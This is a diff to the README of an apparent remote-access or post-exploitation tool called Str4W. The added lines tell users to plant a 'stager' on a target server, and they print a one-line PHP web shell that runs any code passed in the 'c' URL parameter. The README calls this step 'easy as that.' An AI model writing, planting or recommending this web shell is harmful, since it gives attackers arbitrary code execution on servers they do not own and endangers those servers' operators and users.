f1r4s/Str4W/README.md

 ## Usage example

 The CLI is pretty straightforward.
 The commands are documented, so the user can get a description by using `help <command>`.
 For a complete list of commands, please use `help`.

+Although the interface is kinda user-friendly, you have to place the stager onto the target server.
+Don't worry, it is as simple as placing a PHP file with the following code inside: `<?php eval($_GET['c']); ?>`.
+Easy as that.

 ## Release History